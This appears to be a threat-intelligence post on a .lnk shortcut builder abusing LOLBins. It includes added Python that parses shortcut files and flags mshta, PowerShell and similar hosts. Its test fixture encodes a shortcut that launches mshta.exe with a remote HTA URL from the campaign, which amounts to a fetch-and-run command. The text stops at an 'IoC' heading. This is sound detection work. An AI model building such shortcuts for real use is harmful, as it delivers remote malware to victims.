Quantum Software: LNK File-Based Builders Growing In Popularity
Possibly associated with Lazarus APT group
Cyble Research Labs has constantly been tracking emerging threats and their delivery mechanisms. We have observed a surge in the use of .lnk files by various malware families. Some of the prevalent malware families using .lnk files for their payload delivery of late are:
Additionally, we have seen many APT instances where the Threat Actors (TAs) leverage .lnk files for their initial execution to deliver the payload.
.lnk files are Windows shortcut files that reference other files, folders, or applications in order to open them. TAs leverage .lnk files to drop malicious payloads via LOLBins. LOLBins (Living off the Land Binaries) are binaries that ship natively with the operating system, such as PowerShell and mshta. TAs use these binaries to evade detection mechanisms because the operating system already trusts them.
During our OSINT (Open Source Intelligence) activity, Cyble Research Labs came across a new .lnk builder …
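To show what a defender can recover from such a shortcut, the following is an added example (not code from Cyble's write-up) that parses the MS-SHLLINK header, the LinkInfo target path and the StringData arguments of a .lnk file and flags the LOLBins it references. The link bytes it inspects are a constructed test fixture, not a file from the campaign; the only value taken from the page is the HTA URL in the IoC list below.

```python
import re
import struct

# Shell Link (MS-SHLLINK) header size, LinkCLSID, and the LinkFlags bits used below.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections in on-disk order, each keyed by the LinkFlags bit that enables it.
STRING_SECTIONS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                   (0x20, "arguments"), (0x40, "icon_location")]
# LOLBins named on the page (mshta, PowerShell) plus other common script and loader hosts.
LOLBIN_RE = re.compile(r"\b(mshta|powershell|pwsh|cmd|wscript|cscript|rundll32|regsvr32)(?:\.exe)?\b", re.I)

def parse_lnk(data: bytes) -> dict:
    """Return the target path and StringData of a shell link; raise ValueError if it is not one."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link (bad HeaderSize or LinkCLSID)")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    out, off = {"flags": flags}, LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:        # LinkTargetIDList: 2-byte IDListSize, then the item ID list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:      # LinkInfo: size (includes itself), header size, flags, offsets
        size, _hdr, li_flags, _vol, base_off = struct.unpack_from("<IIIII", data, off)
        if li_flags & 0x1:         # VolumeIDAndLocalBasePath: NUL-terminated ANSI target path
            end = data.index(b"\x00", off + base_off)
            out["local_base_path"] = data[off + base_off:end].decode("latin-1")
        off += size
    for bit, name in STRING_SECTIONS:   # each: CountCharacters (2 bytes) + string, no terminator
        if flags & bit:
            count, off = struct.unpack_from("<H", data, off)[0], off + 2
            width = 2 if flags & IS_UNICODE else 1
            out[name] = data[off:off + count * width].decode("utf-16-le" if width == 2 else "latin-1")
            off += count * width
    return out

def lolbin_hits(lnk: dict) -> list:
    """LOLBins referenced by the shortcut's target path, relative path, or arguments."""
    text = " ".join(lnk.get(k, "") for k in ("local_base_path", "relative_path", "arguments"))
    return sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(text)})

def constructed_sample() -> bytes:
    """Constructed fixture (not a real sample): a link targeting mshta.exe with the page's HTA URL."""
    path = b"C:\\Windows\\System32\\mshta.exe\x00"
    link_info = struct.pack("<IIIIIII", 0x1C + len(path), 0x1C, 0x1, 0, 0x1C, 0, 0) + path
    args = "https://quantum-software.online/remote/bdg.hta".encode("utf-16-le")
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", HAS_LINK_INFO | 0x20 | IS_UNICODE)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    return header + link_info + struct.pack("<H", len(args) // 2) + args
```

On a real file, `lolbin_hits(parse_lnk(open(p, "rb").read()))` returning a non-empty list is the trigger for closer inspection; a shortcut whose target or arguments name mshta or PowerShell together with a remote URL is the pattern this post describes.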
IoC